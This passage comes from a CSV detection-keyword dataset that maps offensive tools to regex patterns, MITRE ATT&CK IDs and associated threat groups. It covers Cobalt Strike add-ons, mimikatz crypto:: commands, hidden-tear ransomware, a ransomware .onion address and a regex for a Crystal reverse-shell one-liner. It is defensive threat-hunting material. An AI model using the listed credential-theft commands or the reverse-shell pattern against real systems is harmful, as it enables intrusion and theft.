TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39125" "*CRTInjectElevated*",".{0,1000}CRTInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39126" "*CRTInjectWithoutPid*",".{0,1000}CRTInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39127" "*crunch * -o *.txt*",".{0,1000}crunch\s.{0,1000}\s\-o\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39128" "*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*",".{0,1000}crunch\s4\s7\sabcdefghijklmnopqrstuvwxyz1234567890\s\-o\swordlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39129" "*crypt0p3g/bof-collection*",".{0,1000}crypt0p3g\/bof\-collection.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","39130" "*crypto::capi*",".{0,1000}crypto\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39131" "*crypto::certificates*",".{0,1000}crypto\:\:certificates.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39132" "*crypto::certtohw*",".{0,1000}crypto\:\:certtohw.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39133" "*crypto::cng*",".{0,1000}crypto\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39134" "*crypto::extract*",".{0,1000}crypto\:\:extract.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39135" "*crypto::keys*",".{0,1000}crypto\:\:keys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39136" "*crypto::providers*",".{0,1000}crypto\:\:providers.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39137" "*crypto::sc*",".{0,1000}crypto\:\:sc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39138" "*crypto::scauth*",".{0,1000}crypto\:\:scauth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39139" "*crypto::tpminfo*",".{0,1000}crypto\:\:tpminfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39140" "*crypto_identifier*",".{0,1000}crypto_identifier.{0,1000}","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. 
Useful for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tool","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","N/A","2","124","24","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z","39141" "*Cryptolocker-1.0.0.rar*",".{0,1000}Cryptolocker\-1\.0\.0\.rar.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variants in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","39142" "*cryptr3fmuv4di5uiczofjuypopr63x2gltlsvhur2ump4ebru2xd3yd.onion*",".{0,1000}cryptr3fmuv4di5uiczofjuypopr63x2gltlsvhur2ump4ebru2xd3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39143" "*cryptvortex *",".{0,1000}cryptvortex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39144" "*crystal eval 'require ""process"";require 
""socket"";*Socket.tcp*connect*Process.new*output.gets_to_end*",".{0,1000}crystal\seval\s\'require\s\""process\""\;require\s\""socket\""\;.{0,1000}Socket\.tcp.{0,1000}connect.{0,1000}Process\.new.{0,1000}output\.gets_to_end.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","39145" "*cs2modrewrite.py*",".{0,1000}cs2modrewrite\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","39146" "*cs2nginx.py*",".{0,1000}cs2nginx\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","39147" 
"*csandker/Azure-AccessPermissions*",".{0,1000}csandker\/Azure\-AccessPermissions.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","39148" "*CS-Avoid-killing*",".{0,1000}CS\-Avoid\-killing.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 